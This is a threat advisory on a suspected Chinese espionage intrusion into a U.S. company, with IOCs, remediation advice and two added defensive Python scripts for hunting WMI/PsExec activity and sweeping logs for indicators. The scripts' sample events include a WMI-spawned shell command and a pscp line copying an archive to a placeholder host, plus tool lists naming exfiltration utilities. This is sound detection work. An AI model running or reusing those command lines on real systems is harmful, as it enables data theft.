December 6, 2024
Severity
High
Analysis Summary
Earlier this year, a four-month infiltration by a suspected Chinese threat actor targeted a major U.S. company. Researchers said that the malicious activity was first discovered on April 11, 2024, and persisted until August. They do not, however, discount the chance that the intrusion might have happened sooner.
The researchers said, “The attackers moved laterally across the organization's network, compromising multiple computers.”
Exchange Servers were among the systems targeted, indicating that the attackers were harvesting email to gather intelligence. Exfiltration techniques were also observed, indicating that specific information was stolen from the company. Although it was mentioned that the victim has a sizable presence in China, the name of the organization affected by the ongoing attack campaign was not revealed.
The usage of DLL side-loading, a tactic that is popular among several Chinese threat groups, and the existence of artifacts that have been previously linked to a state-sponsored operation codenamed Crimson Palace are the reasons for the connections to China as the possible culprits. It is also noteworthy that in 2023, an attacker who may have been associated with another hacker collective located in China, Daggerfly—also known as Bronze Highland, Evasive Panda, and StormBamboo—targeted the company.
The attack uses living-off-the-land (LotL) programs including Windows Management Instrumentation (WMI), PsExec, and PowerShell, as well as open-source tools like FileZilla, Impacket, and PSCP, in addition to DLL side-loading to execute malicious payloads. At this point, it is unknown exactly which initial access method was used to compromise the network. Nevertheless, the investigation revealed that the machine containing the first signs of infiltration had a command executed on it via WMI from another system on the network.
Given that the command came from a different system on the network, it is possible that the intrusion started before April 11 and that the attackers had already infiltrated at least one other machine on the organization's network. Other malicious actions that the attackers later carried out included downloading programs like FileZilla, PSCP, and WinRAR, attacking Microsoft Exchange servers, stealing credentials, and running malicious DLL files.
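The behaviour described above (a command launched through WMI from another host, PsExec service installs, and the arrival of transfer tools such as FileZilla, PSCP and WinRAR) is the kind of thing a defender can hunt for in process-creation telemetry. The following is an added example, not code from the advisory or from the researchers' report. It runs three simple rules over constructed Sysmon-style process-creation events; the event fields, host names and paths are assumptions made for the example.

```python
# Hunt rules for the LotL behaviour described in the advisory, run over
# constructed process-creation events (Sysmon Event ID 1 style fields).
# The sample events are made up for this example; they are not real telemetry.

SAMPLE_EVENTS = [
    # Remote WMI execution: WmiPrvSE.exe spawning a shell on the target host
    {"host": "WS-01",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c whoami > C:\Windows\Temp\out.txt"},
    # Benign activity: a user opening an editor from Explorer
    {"host": "WS-02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
    # PsExec leaves its service binary running under services.exe
    {"host": "SRV-EX01",
     "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe",
     "command_line": "PSEXESVC.exe"},
    # A transfer tool run from a user download location
    {"host": "WS-03",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\jdoe\Downloads\pscp.exe",
     "command_line": r"pscp.exe -pw ***** C:\archive.rar user@host:/tmp/"},
]

# Shells and script hosts that should rarely be children of the WMI provider host
WMI_SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Transfer and archiving tools named in the advisory
TRANSFER_TOOLS = {"filezilla.exe", "pscp.exe", "winrar.exe", "rar.exe"}


def basename(windows_path: str) -> str:
    """Return the lower-cased file name of a Windows path (works on any OS)."""
    return windows_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of every hunt rule the event matches (empty if none)."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    hits = []
    if parent == "wmiprvse.exe" and image in WMI_SHELL_CHILDREN:
        hits.append("wmi_remote_exec")          # command launched via WMI
    if image == "psexesvc.exe":
        hits.append("psexec_service")           # PsExec service binary active
    if image in TRANSFER_TOOLS:
        hits.append("transfer_tool")            # staging / exfil tooling present
    return hits


def hunt(events: list) -> dict:
    """Map each host to the rules it triggered; hosts with no hits are omitted."""
    findings = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.setdefault(ev["host"], []).extend(hits)
    return findings


if __name__ == "__main__":
    for host, rules in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

These rules are deliberately narrow; in practice a WMI-spawned shell is a lead to pivot from (which remote host issued the call, what the command line did next), not a conviction on its own.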
Impact
- Data Exfiltration
- Sensitive Data Theft
- Cyber Espionage
- Command Execution
Indicators of Compromise
IP
- 149.28.154.23
MD5
- 078d72a61fe3de477669fcf07ef66fb3
- db89ec570e6281934a5c5fcf7f4c8967
SHA-256
- c1bec59afd3c6071b461bb480ff88ba7e36759a949f4850cc26f0c18e4c811a0
- edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef
SHA-1
- ad53700ca78f887ef6fdd0d2cfcc570c107675e2
- 0098c79e1404b4399bf0e686d88dbf052269a302
URL
- http://149.28.154.23:443/
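To act on the indicators above, the usual first step is to sweep existing proxy logs and file-hash inventories for any hit. The following is an added example, not code from the advisory: it loads the IP, URL and hash indicators listed on this page and checks them against constructed sample proxy log lines and a constructed file inventory. The log format, host names and file paths are assumptions made for the example; only the indicator values come from the page.

```python
import re

# Indicators of compromise as listed in the advisory
IOC_IPS = {"149.28.154.23"}
IOC_URLS = {"http://149.28.154.23:443/"}
IOC_HASHES = {
    # MD5
    "078d72a61fe3de477669fcf07ef66fb3",
    "db89ec570e6281934a5c5fcf7f4c8967",
    # SHA-1
    "ad53700ca78f887ef6fdd0d2cfcc570c107675e2",
    "0098c79e1404b4399bf0e686d88dbf052269a302",
    # SHA-256
    "c1bec59afd3c6071b461bb480ff88ba7e36759a949f4850cc26f0c18e4c811a0",
    "edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef",
}

# Constructed proxy log sample (format is an assumption for this example)
SAMPLE_PROXY_LOG = """\
2024-04-11T08:01:55Z ws-01 10.0.5.21 GET http://www.example.com/ 200
2024-04-11T08:02:13Z ws-01 10.0.5.21 CONNECT http://149.28.154.23:443/ 200
2024-04-11T08:03:40Z ws-02 10.0.5.22 GET http://www.example.com/news 200
"""

# Constructed file inventory sample; the benign hash is made up
SAMPLE_FILE_INVENTORY = [
    {"path": r"C:\Windows\System32\notepad.exe",
     "sha256": "0" * 64},
    {"path": r"C:\ProgramData\update\loader.dll",
     "sha256": "C1BEC59AFD3C6071B461BB480FF88BA7E36759A949F4850CC26F0C18E4C811A0"},
    {"path": r"C:\Users\jdoe\AppData\Local\Temp\svc.dll",
     "md5": "db89ec570e6281934a5c5fcf7f4c8967"},
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://\S+")


def scan_proxy_log(text: str) -> list:
    """Return (line_number, indicator_type, value) for every IOC hit in the log."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for ip in IPV4_RE.findall(line):
            if ip in IOC_IPS:
                hits.append((line_no, "ip", ip))
        for url in URL_RE.findall(line):
            if url in IOC_URLS:
                hits.append((line_no, "url", url))
    return hits


def scan_file_inventory(records: list) -> list:
    """Return the paths whose MD5, SHA-1 or SHA-256 matches a listed hash."""
    matched = []
    for rec in records:
        for algo in ("md5", "sha1", "sha256"):
            digest = rec.get(algo, "").strip().lower()   # normalise case before comparing
            if digest and digest in IOC_HASHES:
                matched.append(rec["path"])
                break
    return matched


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("proxy hit:", hit)
    for path in scan_file_inventory(SAMPLE_FILE_INVENTORY):
        print("file hit:", path)
```

Hash comparison is case-insensitive because inventory tools emit digests in mixed case; the IP rule is checked separately from the URL rule so a bare connection to the address is still caught when the full URL is not logged.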
Remediation
- Block all threat indicators at your respective controls.
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
- Along with network and system hardening, code hardening should be implemented within the organization so that its websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed code.
- Ensure that all software, particularly software from third-party vendors, is obtained from trusted sources and that updates are obtained from the vendor's official website or app store.
- Conduct regular security assessments and audits of all software, especially those that handle sensitive data, to detect any suspicious activities.
- Implement multi-factor authentication and strong password policies to prevent unauthorized access to sensitive systems and data.
- Train employees on best practices for identifying and reporting suspicious activities, such as phishing emails or unusual network traffic.
- Deploy endpoint protection solutions with advanced threat detection capabilities to identify and block any malicious activities.
- Implement network segmentation and access controls to limit the spread of malware in case of a successful attack.
- Monitor network traffic and system logs to detect any unusual or suspicious activities, such as unauthorized file transfers or unusual process execution.
- Develop an incident response plan that outlines the steps to be taken in case of a successful attack, including how to isolate and contain the affected systems and how to communicate with stakeholders, such as customers and regulatory bodies.